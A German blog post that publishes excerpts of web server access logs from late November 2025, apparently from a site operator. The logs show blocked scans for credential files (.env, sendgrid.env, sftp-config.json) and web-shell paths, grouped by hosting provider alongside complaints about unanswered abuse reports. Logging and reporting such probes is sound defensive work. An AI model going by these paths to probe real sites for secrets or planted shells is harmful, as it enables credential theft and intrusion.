Kategorie: Protokolle

Hacker Protokoll November 2025

Das Hacker Protokoll November 2025

Dieses Hacker Protokoll November 2025 ist nicht mehr so umfangreich, da wir ja nicht jeden Zugriff dieser Hacker-Idioten posten. Trotzdem immer wieder diese unermüdlichen Login Idioten und Amateur Hacker, die es wieder und immer wieder versuchen, trotz einem 403, eine Homepage zu hacken.

Es wird bestimmt auch jeden „braven“ Besucher hier bestimmt amüsieren, denn hier findet man die Auszug von gewissen Taugenixe mit ihren lächerlichen und armseeligen Versuchen, um eine Homepage zu übernehmen bzw. zu hacken.

Dieses Hacker Protokoll November 2025 soll ebenfalls so einige Hosting-Provider und Provider für Cloud´s endlich mal wachrütteln, damit sie ENDLICH die Webspaces ihrer Kunden besser vor diesen ganzen Login- und Hacker-Müll schützen!!! Viele Mails an Abuse der jeweiligen verantwortlichen Provider wurden geschrieben. Oft kam nur Blabla aber es ändert sich absolut NICHTS!

Somit hier nun das Protokoll vom November. Man bedenke, die jeweiligen Tabellen sind immer nur ein ganz kleiner Auszug von dem, was da wirklich über den ganzen Tag auf den bestroffenen Websites versucht wurde. Zum Schutz der betroffenen Domains wurden diese ausgeschwärzt oder mit Stern (*) versehen.

WICHTIG! Wir posten nur noch etwas, das besonders auffällt oder eben besonders amüsant ist. Die meisten der Hacker-Idioten bekommen eh nur noch ein 403 oder eben ein 302! Wer auch hier gesperrt ist, landet mit seinem „Scheiss“ dann da, wo er hingehört, nämlich beim Klopapier! *LOL*

Verantwortungsvolle Provider schliessen diese SICHERHEITSLÜCKEN in den entsprechenden Websites/Server nach unserer Meldung unverzüglich!

PROTOKOLL-AUSZÜGE zum LETZTEN WOCHENENDE im November 2025!

Irgendwann ist auch bei uns eine Grenze erreicht und dann werden entsprechende Hacking-Versuche hier von uns veröffentlicht!

Entsprechende Bemerkungen zu den mit verantwortlichen Providern ist jeweils mit aufgeführt.

PROVIDER AS13335 – Cloudflare, Inc.

Ein registrierter Provider hat letztendlich die VERANTWORTUNG! Immer wieder erleben wir es, dass über diverse Provider dann solche Antworten kommen:

“ Cloudflare does not generally serve as a hosting provider, does not organize or alter content, and does not have the ability to remove content hosted by others.“

Solch ein Blabla ist uninteressant, primär hat der registrierte Provider die VERANTWORTUNG! Was er dann intern mit seinen IP-Adressen macht, ist SEIN PROBLEM!

AS13335 – Cloudflare, Inc.
abuse@cloudflare.com
101 Townsend Street, San Francisco, CA, 94107, United States

104.28.246.112 websiteX.com – – [28/Nov/2025:16:14:04 +0100] „GET /style.php HTTP/1.0“ 403 – „-“ „Go-http-client/1.1“
104.28.246.112 websiteX.com – – [28/Nov/2025:16:14:04 +0100] „GET /wp-content/style.php HTTP/1.0“ 403 – „-“ „Go-http-client/1.1“
104.28.246.112 websiteX.com – – [28/Nov/2025:16:14:04 +0100] „GET /wp-content/themes/style.php HTTP/1.0“ 403 – „-“ „Go-http-client/1.1“
104.28.246.112 websiteX.com – – [28/Nov/2025:16:14:05 +0100] „GET /wp-admin/style.php HTTP/1.0“ 403 – „-“ „Go-http-client/1.1“
104.28.246.112 websiteX.com – – [28/Nov/2025:16:14:05 +0100] „GET /wp-includes/style.php HTTP/1.0“ 403 – „-“ „Go-http-client/1.1“
104.28.246.112 websiteX.com – – [28/Nov/2025:16:14:05 +0100] „GET /chosen.php?p= HTTP/1.0“ 403 – „-“ „Go-http-client/1.1“
104.28.246.112 websiteX.com – – [28/Nov/2025:16:14:05 +0100] „GET /file.php HTTP/1.0“ 302 20 „-“ „Go-http-client/1.1“
… und so weiter…
+
104.28.246.117 websiteX.com – – [28/Nov/2025:16:55:32 +0100] „GET /style.php HTTP/1.0“ 403 – „-“ „Go-http-client/1.1“
104.28.246.117 websiteX.com – – [28/Nov/2025:16:55:32 +0100] „GET /wp-content/style.php HTTP/1.0“ 403 – „-“ „Go-http-client/1.1“
104.28.246.117 websiteX.com – – [28/Nov/2025:16:55:33 +0100] „GET /wp-content/themes/style.php HTTP/1.0“ 403 – „-“ „Go-http-client/1.1“
104.28.246.117 websiteX.com – – [28/Nov/2025:16:55:33 +0100] „GET /wp-admin/style.php HTTP/1.0“ 403 – „-“ „Go-http-client/1.1“
104.28.246.117 websiteX.com – – [28/Nov/2025:16:55:33 +0100] „GET /wp-includes/style.php HTTP/1.0“ 403 – „-“ „Go-http-client/1.1“
104.28.246.117 websiteX.com – – [28/Nov/2025:16:55:33 +0100] „GET /chosen.php?p= HTTP/1.0“ 403 – „-“ „Go-http-client/1.1“
104.28.246.117 websiteX.com – – [28/Nov/2025:16:55:33 +0100] „GET /file.php HTTP/1.0“ 302 20 „-“ „Go-http-client/1.1“
… und so weiter…
+
2a09:bac5:952b:3af::5e:20 websiteX.com – – [28/Nov/2025:20:53:29 +0100] „GET /style.php HTTP/1.0“ 403 – „-“ „Go-http-client/1.1“
2a09:bac5:952b:3af::5e:20 websiteX.com – – [28/Nov/2025:20:53:29 +0100] „GET /wp-content/style.php HTTP/1.0“ 403 – „-“ „Go-http-client/1.1“
2a09:bac5:952b:3af::5e:20 websiteX.com – – [28/Nov/2025:20:53:30 +0100] „GET /wp-content/themes/style.php HTTP/1.0“ 403 – „-“ „Go-http-client/1.1“
2a09:bac5:952b:3af::5e:20 websiteX.com – – [28/Nov/2025:20:53:30 +0100] „GET /wp-admin/style.php HTTP/1.0“ 403 – „-“ „Go-http-client/1.1“
2a09:bac5:952b:3af::5e:20 websiteX.com – – [28/Nov/2025:20:53:30 +0100] „GET /wp-includes/style.php HTTP/1.0“ 403 – „-“ „Go-http-client/1.1“
2a09:bac5:952b:3af::5e:20 websiteX.com – – [28/Nov/2025:20:53:30 +0100] „GET /chosen.php?p= HTTP/1.0“ 403 – „-“ „Go-http-client/1.1“
2a09:bac5:952b:3af::5e:20 websiteX.com – – [28/Nov/2025:20:53:30 +0100] „GET /file.php HTTP/1.0“ 302 20 „-“ „Go-http-client/1.1“
… und so weiter…

PROVIDER AS135450 – PT Berkah Solusi Teknologi Informasi

Glänzt durch absolute IGNORANZ! KEINE ANTWORT, KEINE REAKTION BZGL. ABUSE MAIL! SO ETWAS IST EIN NOGO!

AS135450 – PT Berkah Solusi Teknologi Informasi
abuse@ptbsti.com
Gedung STC Senayan, Jl. Asia Afrika Lt.02 No.35, Jakarta Pusat 12190

103.77.107.222 websiteX.com – – [28/Nov/2025:17:22:28 +0100] „GET /sftp-config.json HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:77.0) Gecko/20100101 Firefox/77.0“
103.77.107.222 websiteX.com – – [28/Nov/2025:17:22:29 +0100] „GET /.vscode/sftp.json HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:77.0) Gecko/20100101 Firefox/77.0“
+
103.65.236.153 websiteX.com – – [28/Nov/2025:21:56:53 +0100] „GET /sftp-config.json HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:77.0) Gecko/20100101 Firefox/77.0“
103.65.236.153 websiteX.com – – [28/Nov/2025:21:56:54 +0100] „GET /.vscode/sftp.json HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:77.0) Gecko/20100101 Firefox/77.0“
+
103.65.237.216 websiteX.com – – [30/Nov/2025:06:17:06 +0100] „GET /sftp-config.json HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:77.0) Gecko/20100101 Firefox/77.0“
103.65.237.216 websiteX.com – – [30/Nov/2025:06:17:07 +0100] „GET /.vscode/sftp.json HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:77.0) Gecko/20100101 Firefox/77.0“
+
103.77.107.222 websiteX.com – – [30/Nov/2025:03:08:12 +0100] „GET /sftp-config.json HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:77.0) Gecko/20100101 Firefox/77.0“
103.77.107.222 websiteX.com – – [30/Nov/2025:03:08:19 +0100] „GET /.vscode/sftp.json HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:77.0) Gecko/20100101 Firefox/77.0“
+
103.77.107.222 websiteX.de – – [30/Nov/2025:03:43:06 +0100] „GET /sftp-config.json HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:77.0) Gecko/20100101 Firefox/77.0“
103.77.107.222 websiteX.de – – [30/Nov/2025:03:43:07 +0100] „GET /.vscode/sftp.json HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:77.0) Gecko/20100101 Firefox/77.0“
+
103.77.107.222 websiteX.com – – [30/Nov/2025:04:05:12 +0100] „GET /sftp-config.json HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:77.0) Gecko/20100101 Firefox/77.0“
103.77.107.222 websiteX.com – – [30/Nov/2025:04:05:13 +0100] „GET /.vscode/sftp.json HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:77.0) Gecko/20100101 Firefox/77.0“
… und so weiter!!!

PROVIDER AS202306 – HOSTGLOBAL.PLUS LTD

Glänzt durch absolute IGNORANZ! KEINE ANTWORT, KEINE REAKTION BZGL. ABUSE MAIL! SO ETWAS IST EIN NOGO!

AS202306 – HOSTGLOBAL.PLUS LTD
abuse@hostglobal.plus
20-22 Wenlock Road, London, England, N1 7GU

78.153.140.218 www.websiteX.com – – [29/Nov/2025:00:40:55 +0100] „GET /.env HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Macintosh; U; PPC Mac OS X; sv-se) AppleWebKit/418.9 (KHTML, like Gecko) Safari/419.3“
78.153.140.218 www.websiteX.com – – [29/Nov/2025:00:40:55 +0100] „GET / HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.2 (KHTML, like Gecko) Chrome/4.0.222.5 Safari/532.2“
78.153.140.218 www.websiteX.com – – [29/Nov/2025:00:40:55 +0100] „GET /.env HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/530.1 (KHTML, like Gecko) Chrome/2.0.170.0 Safari/530.1“
78.153.140.218 www.websiteX.com – – [29/Nov/2025:00:40:56 +0100] „GET /sendgrid.env HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 6.0) AppleWebKit/537.11 (KHTML, like Gecko) Chrome/23.0.1271.97 Safari/537.11“
78.153.140.218 www.websiteX.com – – [29/Nov/2025:00:40:56 +0100] „GET / HTTP/1.0“ 403 – „-“ „Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/6.0; .NET4.0E; .NET4.0C; .NET CLR 3.5.30729; .NET CLR 2.0.50727; .NET CLR 3.0.30729; MAGWJS)“
78.153.140.218 www.websiteX.com – – [29/Nov/2025:00:40:56 +0100] „GET /twilio.env HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Linux; U; Android 2.3.6; pt-br; LG-E405f Build/GRK39F) AppleWebKit/533.1 (KHTML, like Gecko) Version/4.0 Mobile Safari/533.1 MMS/LG-Android-MMS-V1.2“
78.153.140.218 www.websiteX.com – – [29/Nov/2025:00:40:56 +0100] „GET /sendgrid.env HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/538.1 (KHTML, like Gecko) PhantomJS/2.1.1 Safari/538.1“
78.153.140.218 www.websiteX.com – – [29/Nov/2025:00:40:56 +0100] „GET /api/.env HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 6.1; rv:5.0) Gecko/20100101 Firefox/5.02“
78.153.140.218 www.websiteX.com – – [29/Nov/2025:00:40:56 +0100] „GET /phpinfo/ HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Macintosh; U; PPC Mac OS X 10_5_6; fr-fr) AppleWebKit/525.27.1 (KHTML, like Gecko) Version/3.2.1 Safari/525.27.1“
78.153.140.218 www.websiteX.com – – [29/Nov/2025:00:40:56 +0100] „GET /twilio.env HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Linux; U; Android 4.3; en-us; SAMSUNG-SGH-I727 Build/JZO54K) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30“
… und so weiter….
+
78.153.140.171 www.websiteX.de – – [28/Nov/2025:19:40:06 +0100] „GET /.env HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Linux; U; Android 4.3; en-us; SCH-R530U Build/JSS15J) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30 USCC-R530U“
78.153.140.171 www.websiteX.de – – [28/Nov/2025:19:40:06 +0100] „GET /.env HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Linux; Android 4.4.2; ARCHOS 50c Neon Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Mobile Safari/537.36“
78.153.140.171 www.websiteX.de – – [28/Nov/2025:19:40:07 +0100] „GET / HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Linux; Android 6.0.1; SM-G935F Build/MMB29K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Mobile Safari/537.36“
78.153.140.171 www.websiteX.de – – [28/Nov/2025:19:40:07 +0100] „GET / HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Linux; U; Android 2.3.6; es-us; Y220-U05 Build/HUAWEIY220-U05) AppleWebKit/533.1 (KHTML, like Gecko) Version/4.0 Mobile Safari/533.1“
78.153.140.171 www.websiteX.de – – [28/Nov/2025:19:40:07 +0100] „GET /sendgrid.env HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows Phone 8.1; ARM; Trident/7.0; Touch; rv:11.0; IEMobile/11.0; NOKIA; Lumia 635) like Gecko“
78.153.140.171 www.websiteX.de – – [28/Nov/2025:19:40:08 +0100] „GET /twilio.env HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Linux; Android 4.4.4; XT1080 Build/SU6-7.2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Mobile Safari/537.36“
78.153.140.171 www.websiteX.de – – [28/Nov/2025:19:40:08 +0100] „GET /sendgrid.env HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (X11; U; Linux i686; es-ES; rv:1.8.1.14) Gecko/20080419 Ubuntu/8.04 (hardy) Firefox/2.0.0.14“
78.153.140.171 www.websiteX.de – – [28/Nov/2025:19:40:08 +0100] „GET /api/.env HTTP/1.0“ 403 – „-“ „Opera/7.0 (Windows 2000; U) [en]“
78.153.140.171 www.websiteX.de – – [28/Nov/2025:19:40:08 +0100] „GET /twilio.env HTTP/1.0“ 403 – „-“ „Opera/9.80 (Linux i686) Presto/2.12.407 Version/12.51“
… und so weiter….

PROVIDER AS209605 – UAB Host Baltic

Glänzt durch absolute IGNORANZ! KEINE ANTWORT MEHR, KEINE REAKTION BZGL. ABUSE MAIL! SO ETWAS IST EIN NOGO!

DIE HACKING-VERSUCHE ÜBER DIE NETZE VON DIESEN PROVIDER LAUFEN NUN SEIT MONATEN!!!

AS209605 – UAB Host Baltic
admin@serveroffer.lt
Draugystes g. 19, 51230 Kaunas, LITHUANIA

141.98.11.169 www.websiteX.de – – [28/Nov/2025:22:37:37 +0100] „GET /wp-login.php HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 11.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36“
141.98.11.169 www.websiteX.de – – [28/Nov/2025:22:37:47 +0100] „GET /wp-login.php HTTP/1.0“ 403 – „https://www.bing.com/“ „Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36“
141.98.11.169 www.websiteX.de – – [28/Nov/2025:22:37:47 +0100] „GET /wp-admin/ HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 11.0; Win64; x64; rv:119.0) Gecko/20100101 Firefox/119.0“

PROVIDER AS62240 – Clouvider

BEI ABUSE-MAIL KOMMT NUR EINE AUTOMATISCHE ANTWORT, KEINE WEITERE INFO, OB DAS SICHERHEITSPROBLEM IN SEINEM NETZWERK GELÖST IST! EIN NOGO!

AS62240 – Clouvider
abuse@clouvider.net
900 N. Alameda, Los Angeles, CA, 90012, United States of America

45.149.173.201 websiteX.com – – [29/Nov/2025:07:27:23 +0100] „GET /wp-includes/wlwmanifest.xml HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36“
45.149.173.201 websiteX.com – – [29/Nov/2025:07:27:24 +0100] „GET /xmlrpc.php?rsd HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36“
45.149.173.201 websiteX.com – – [29/Nov/2025:07:27:24 +0100] „GET / HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36“
45.149.173.201 websiteX.com – – [29/Nov/2025:07:27:25 +0100] „GET /blog/wp-includes/wlwmanifest.xml HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36“
45.149.173.201 websiteX.com – – [29/Nov/2025:07:27:25 +0100] „GET /web/wp-includes/wlwmanifest.xml HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36“
45.149.173.201 websiteX.com – – [29/Nov/2025:07:27:25 +0100] „GET /wordpress/wp-includes/wlwmanifest.xml HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36“
45.149.173.201 websiteX.com – – [29/Nov/2025:07:27:25 +0100] „GET /website/wp-includes/wlwmanifest.xml HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36“
… und so weiter….

PROVIDER AS9329 – Sri Lanka Telecom Internet

Glänzt durch absolute IGNORANZ! KEINE ANTWORT, KEINE REAKTION BZGL. ABUSE MAIL! SO ETWAS IST EIN NOGO!

DIE HACKING-VERSUCHE ÜBER DIE NETZE VON DIESEN PROVIDER LAUFEN NUN SEIT MONATEN!!!

AS9329 – Sri Lanka Telecom Internet
abuse@slt.lk
Internet Division, 7th floor, OTS Building, Sri Lanka Telecom

220.247.224.162 websiteX.com – – [29/Nov/2025:10:56:45 +0100] „GET /wp-content/plugins/pwnd/pwnd.php HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36“
220.247.224.162 websiteX.com – – [29/Nov/2025:10:56:45 +0100] „GET /wp-content/plugins/pwnd-1/pwnd.php HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36“
220.247.224.162 websiteX.com – – [29/Nov/2025:10:56:45 +0100] „GET /wp-content/plugins/pwnd-2/pwnd.php HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36“
220.247.224.162 websiteX.com – – [29/Nov/2025:10:56:46 +0100] „GET /wp-content/plugins/fix/up.php HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36“
+
220.247.224.162 websiteX.com – – [29/Nov/2025:07:13:45 +0100] „GET /wp-content/plugins/pwnd/pwnd.php HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36“
220.247.224.162 websiteX.com – – [29/Nov/2025:07:13:45 +0100] „GET /wp-content/plugins/pwnd-1/pwnd.php HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36“
220.247.224.162 websiteX.com – – [29/Nov/2025:07:13:46 +0100] „GET /wp-content/plugins/pwnd-2/pwnd.php HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36“
220.247.224.162 websiteX.com – – [29/Nov/2025:07:13:46 +0100] „GET /wp-content/plugins/fix/up.php HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36“

PROVIDER AS215476 – Inside Network LTD

Glänzt durch absolute IGNORANZ! KEINE ANTWORT, KEINE REAKTION BZGL. ABUSE MAIL! SO ETWAS IST EIN NOGO!

AS215476 – Inside Network LTD
abuse@insidenetwork.info
16 KERFIELD PLACE LONDON ENGLAND SE5 8SX, UK

77.90.185.245 websiteX.com – – [29/Nov/2025:17:01:52 +0100] „GET /wp-login.php HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 11.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36“
77.90.185.245 websiteX.com – – [29/Nov/2025:17:02:02 +0100] „GET /wp-login.php HTTP/1.0“ 403 – „https://www.bing.com/“ „Mozilla/5.0 (Macintosh; Intel Mac OS X 13_6_1; rv:118.0) Gecko/20100101 Firefox/118.0“
77.90.185.245 websiteX.com – – [29/Nov/2025:17:02:02 +0100] „GET /wp-admin/ HTTP/1.0“ 403 – „https://www.bing.com/“ „Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.1 Safari/605.1.15“
+
77.90.185.10 websiteX.com – – [30/Nov/2025:02:14:20 +0100] „GET /wp-login.php HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Macintosh; Intel Mac OS X 13_6_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.6167.85 Safari/537.36“
77.90.185.10 websiteX.com – – [30/Nov/2025:02:14:20 +0100] „GET /wp-login.php HTTP/1.0“ 403 – „https://duckduckgo.com/“ „Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.6261.57 Safari/537.36“
77.90.185.10 websiteX.com – – [30/Nov/2025:02:14:20 +0100] „GET /wp-admin/ HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Macintosh; Intel Mac OS X 12_6_2) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.0 Safari/605.1.15“

PROVIDER AS14956 – RouterHosting LLC

Glänzt durch absolute IGNORANZ! KEINE ANTWORT, KEINE REAKTION BZGL. ABUSE MAIL! SO ETWAS IST EIN NOGO!

AS14956 – RouterHosting LLC
abuse-reports@cloudzy.com
1309 Coffeen Avenue STE 1200, Sheridan, WY 82801, US

167.88.166.23 websiteX.com – – [29/Nov/2025:17:18:11 +0100] „GET /wp-content/plugins/about.php HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Linux; Android 7.0; SM-G892A) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.107 Mobile Safari/537.36“
167.88.166.23 websiteX.com – – [29/Nov/2025:17:18:12 +0100] „GET /inputs.php HTTP/1.0“ 302 20 „-“ „Mozilla/5.0 (Linux; Android 7.0; SM-G892A) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.107 Mobile Safari/537.36“
167.88.166.23 websiteX.com – – [29/Nov/2025:17:18:22 +0100] „GET /geju.php HTTP/1.0“ 302 20 „-“ „Mozilla/5.0 (Linux; Android 7.0; SM-G892A) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.107 Mobile Safari/537.36“
167.88.166.23 websiteX.com – – [29/Nov/2025:17:18:24 +0100] „GET /wp-admin/network/index.php HTTP/1.0“ 302 20 „-“ „Mozilla/5.0 (Linux; Android 7.0; SM-G892A) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.107 Mobile Safari/537.36“
167.88.166.23 websiteX.com – – [29/Nov/2025:17:18:50 +0100] „GET /wp-content/backup/inputs.php HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Linux; Android 7.0; SM-G892A) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.107 Mobile Safari/537.36“
167.88.166.23 websiteX.com – – [29/Nov/2025:17:18:55 +0100] „POST /geju.php HTTP/1.0“ 302 20 „-“ „Mozilla/5.0 (Linux; Android 7.0; SM-G892A) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.107 Mobile Safari/537.36“
… und so weiter….

PROVIDER AS215930 – CIPHER OPERATIONS DOO BEOGRAD – NOVI BEOGRAD

Glänzt durch absolute IGNORANZ! KEINE ANTWORT, KEINE REAKTION BZGL. ABUSE MAIL! SO ETWAS IST EIN NOGO!

DIE HACKING-VERSUCHE ÜBER DIE NETZE VON DIESEN PROVIDER LAUFEN NUN SEIT MONATEN!!!

AS215930 – CIPHER OPERATIONS DOO BEOGRAD – NOVI BEOGRAD
olatunji822@outlook.com
Khreshhatik St., 14D, Kyiv, UA

62.60.130.210 websiteX.com – – [29/Nov/2025:19:12:49 +0100] „GET /wp-login.php HTTP/1.0“ 403 – „“ „Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.6261.57 Safari/537.36“
62.60.130.210 websiteX.com – – [29/Nov/2025:19:12:49 +0100] „GET /wp-admin/ HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.6099.130 Safari/537.36“
62.60.130.210 websiteX.com – – [29/Nov/2025:19:12:49 +0100] „GET /admin/ HTTP/1.0“ 403 – „https://wordpress.org/“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Edg/119.0.2151.97“
62.60.130.210 websiteX.com – – [29/Nov/2025:19:12:49 +0100] „GET /login/ HTTP/1.0“ 403 – „https://www.bing.com/“ „Mozilla/5.0 (Macintosh; Intel Mac OS X 13_6_1) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.1 Safari/605.1.15“
62.60.130.210 websiteX.com – – [29/Nov/2025:19:12:49 +0100] „GET /wp/wp-login.php HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.6045.159 Safari/537.36“
62.60.130.210 websiteX.com – – [29/Nov/2025:19:12:49 +0100] „GET /wordpress/wp-login.php HTTP/1.0“ 403 – „https://twitter.com/“ „Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.6261.57 Safari/537.36“
+
62.60.130.210 websiteX.com – – [29/Nov/2025:20:42:08 +0100] „GET /wp-login.php HTTP/1.0“ 403 – „“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.5993.88 Safari/537.36“
62.60.130.210 websiteX.com – – [29/Nov/2025:20:42:08 +0100] „GET /wp-admin/ HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.6045.159 Safari/537.36“
62.60.130.210 websiteX.com – – [29/Nov/2025:20:42:08 +0100] „GET /login/ HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (X11; Linux x86_64) Gecko/20100101 Firefox/120.0.1“
62.60.130.210 websiteX.com – – [29/Nov/2025:20:42:08 +0100] „GET /wp-login.php HTTP/1.0“ 403 – „“ „Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.6045.159 Safari/537.36“
62.60.130.210 websiteX.com – – [29/Nov/2025:20:42:09 +0100] „GET /wp-admin/ HTTP/1.0“ 403 – „https://www.linkedin.com/“ „Mozilla/5.0 (Windows NT 11.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.6167.85 Safari/537.36“
62.60.130.210 websiteX.com – – [29/Nov/2025:20:42:09 +0100] „GET /login/ HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.6099.130 Safari/537.36“
